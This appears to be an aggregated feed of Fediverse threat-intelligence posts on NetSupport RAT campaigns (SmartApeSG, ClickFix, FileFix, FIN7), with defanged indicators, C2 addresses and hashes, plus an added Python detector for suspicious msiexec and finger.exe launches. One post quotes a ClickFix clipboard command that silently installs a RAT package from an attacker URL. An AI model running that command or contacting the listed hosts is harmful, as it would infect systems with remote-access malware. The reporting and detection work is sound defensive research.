#netsupportrat — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #netsupportrat, aggregated by home.social.
-
ClickFix Removes Your Background but Leaves the Malware
BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.
Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault
-
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826
-
2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.
Details at www.malware-traffic-analysis.net/2025/12/29/index.html
Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.
The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474
-
SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
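The two lures described in this feed (the BackgroundFix post, where the clipboard command invokes finger.exe, and the SmartApeSG FileFix post above, where it is a silent `msiexec /i <https URL> ... /qn` install) both end in a process-creation event that looks nothing like normal user activity. The following detector is an added example written for this page, not code from any of the posts or from malware-traffic-analysis.net: it scans constructed process-creation records (format `timestamp|parent image|image|command line`, all sample lines and the `lure.example.invalid` host are made up) and flags msiexec installing a package from a remote URL, with extra weight for a quiet install launched under explorer.exe (the parent of Run-dialog and Explorer address-bar launches, an assumption about the telemetry), and any finger.exe execution at all. Local and UNC-path msiexec installs are deliberately left alone so the rule does not fire on software deployment.

```python
"""Flag ClickFix / FileFix style command lines in process-creation telemetry.

Added example for this page; the log format and every record below are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Finding:
    timestamp: str
    rule: str
    parent: str
    cmdline: str


# Constructed records: "<timestamp>|<parent image>|<image>|<command line>".
# Lines 1-2 mimic the lures described in the posts (remote msiexec install,
# finger.exe); lines 3-4 are benign installs that must NOT be flagged.
SAMPLE_LOG = r"""
2025-09-22T14:02:11Z|C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec /i https://lure.example.invalid/res/velvet KEY=stage.bat /qn
2025-09-22T14:02:30Z|C:\Windows\explorer.exe|C:\Windows\System32\finger.exe|finger user@lure.example.invalid
2025-09-22T14:03:01Z|C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec /i C:\Users\alice\Downloads\7zip.msi /qn
2025-09-22T14:03:15Z|C:\Program Files\SCCM\ccmexec.exe|C:\Windows\System32\msiexec.exe|msiexec /i \\fileserver\deploy\agent.msi /qn
"""

# msiexec with an install switch whose package argument is an http(s) URL.
MSIEXEC_REMOTE = re.compile(r"(?i)\bmsiexec(?:\.exe)?\b.*?[/-]i\s+\"?(https?://\S+)")
# Quiet / no-UI switches: the lure relies on the victim seeing nothing.
MSIEXEC_QUIET = re.compile(r"(?i)\s[/-](?:qn|quiet|q)\b")
# finger.exe is almost never used legitimately on a workstation.
FINGER = re.compile(r"(?i)(?:^|\\)finger\.exe$")


def parse_line(line: str):
    """Split one constructed record into its four fields."""
    ts, parent, image, cmdline = line.split("|", 3)
    return ts, parent, image, cmdline


def classify(ts: str, parent: str, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding if the record matches a ClickFix-style pattern, else None."""
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    # Assumption: explorer.exe as parent means Run dialog / Explorer address bar.
    interactive = parent_name == "explorer.exe"

    if FINGER.search(image):
        return Finding(ts, f"finger.exe spawned from {parent_name}", parent, cmdline)

    if MSIEXEC_REMOTE.search(cmdline):
        rule = "msiexec installs package from remote URL"
        if MSIEXEC_QUIET.search(cmdline):
            rule += " (silent)"
        if interactive:
            rule += " launched from explorer.exe"
        return Finding(ts, rule, parent, cmdline)

    return None


def scan(log_text: str) -> List[Finding]:
    """Run classify() over every non-empty record and collect the hits."""
    findings: List[Finding] = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        finding = classify(*parse_line(raw))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.timestamp}  {f.rule}\n    parent: {f.parent}\n    cmd:    {f.cmdline}")
```

Running the block prints two hits, the remote silent msiexec install and the finger.exe launch, and stays silent on the two local installs. In a real pipeline the same two regexes map directly onto a Sysmon Event ID 1 or EDR process-creation query; the explorer.exe parent check is what separates a pasted ClickFix command from a script-driven deployment, so keep it as a scoring factor rather than a hard requirement.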
-
2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)
Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.
Other sites have injected script that redirects to the URL for the fake CAPTCHA page.
Direct example (compromised site --> script for CAPTCHA page):
- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js
Redirect example (compromised site --> Redirect URL --> script for CAPTCHA page):
- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js
Either way, you get the same CAPTCHA page.
IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt
cc: @monitorsg
-
2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.
Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html
-
2025-07-15 (Tuesday): Tracking #SmartApeSG
The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing your way through this leads to a #NetSupportRAT infection.
Compromised site (same as yesterday):
- medthermography[.]com
URLs for ClickFix style fake verification page:
- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9
Running the script for NetSupport RAT:
- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773
#NetSupport RAT server (same as yesterday):
- 185.163.45[.]87:443
-
2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing your way through this leads to a #NetSupportRAT infection.
Compromised site:
- medthermography[.]com
URLs for ClickFix style fake verification page:
- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971
Running the script for NetSupport RAT:
- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526
#NetSupport RAT server:
- 185.163.45[.]87:443
-
Example 1: #RunFix
As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT
-
2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT
URL sequence leading to ClickFix:
- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa
URL sequence after running ClickFix script:
- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928
SHA256 hash for smks.zip archive containing NetSupport RAT package:
3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5
NetSupportRAT C2: 185.163.45[.]30:443
cc: @monitorsg
-
2025-06-18 (Wednesday): #SmartApeSG --> #ClickFix lure --> #NetSupportRAT --> #StealCv2
A #pcap of the traffic, the malware/artifacts, and some IOCs are available at https://www.malware-traffic-analysis.net/2025/06/18/index.html.
Today's the 12th anniversary of my first blog post on malware-traffic-analysis.net, so I made this post a bit more old school.
-
GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS
-
2025-03-26 (Wednesday): #SmartApeSG traffic for a fake browser update page leads to a #NetSupport #RAT infection. A zip archive for #StealC sent over the #NetSupportRAT C2 traffic.
The #StealC infection uses DLL side-loading by a legitimate EXE to #sideload the malicious DLL.
A #pcap from an infection, the associated #malware samples, and #IOCs are available at https://www.malware-traffic-analysis.net/2025/03/26/index.html
-
2024-12-17 (Tuesday): #SmartApeSG injected script leads to fake browser update page, and that page leads to a #NetSupport #RAT infection.
Just like my last post here, there are 2 injected scripts in a page from the compromised site, one using depostsolo[.]biz and one using tactlat[.]xyz.
A #pcap of the infection traffic, associated malware samples and more information is available at https://www.malware-traffic-analysis.net/2024/12/17/index.html
NetSupportRAT C2 for this campaign continues to be 194.180.191[.]64 since as early as 2024-11-22.
-
2024-12-13 (Friday): ww.anceltech[.]com compromised with #SmartApeSG leading to #NetSupport #RAT
Saw 2 injected scripts, one for jitcom[.]info and best-net[.]biz.
Pivoting on best-net[.]biz in URLscan show signs of six other possibly compromised sites: https://urlscan.io/search/#best-net.biz
Those possibly compromised sites are:
- destinationbedfordva[.]com
- exceladept[.]com
- thefilmverdict[.]com
- thenapministry[.]com
- www.estatesale-finder[.]com
- www.freepetchipregistry[.]com
I haven't tried them yet to confirm, but that's always been the case when I pivot on the SmartApeSG domains in URLscan.
#NetSupportRAT C2 for this campaign since as early as 2024-11-22 has been 194.180.191[.]64
-
2024-12-11 (Wednesday): Zip archive containing #NetSupport #RAT (#NetSupportRAT) package hosted at hxxps[:]//homeservicephiladelphia[.]info/work/yyy.zip
The C2 for this NetSupport package is 194.180.191[.]64, which is a known NetSupport C2 active since 2024-11-22, per ThreatFox: https://threatfox.abuse.ch/ioc/1346763/
Nothing new on the NetSupport side. I'm sure that hosting URL is part of an infection chain, but I don't know what's leading to it.
-
The Russian cybercrime group FIN7 ran a network of fake AI undressing sites that delivered credential stealing malware to those who uploaded pictures. I gotta say, this is one group of cybercrime victims that I don't feel sorry for.
https://www.silentpush.com/blog/fin7-malware-deepfake-ai-honeypot/
#FIN7 #Russia #Cybercrime #NetSupport #NetSupportRAT #RAT #Malware #CredentialTheft #AI #Deepfake #Deepfakes #DeepNude #DeepNueds #SilentPush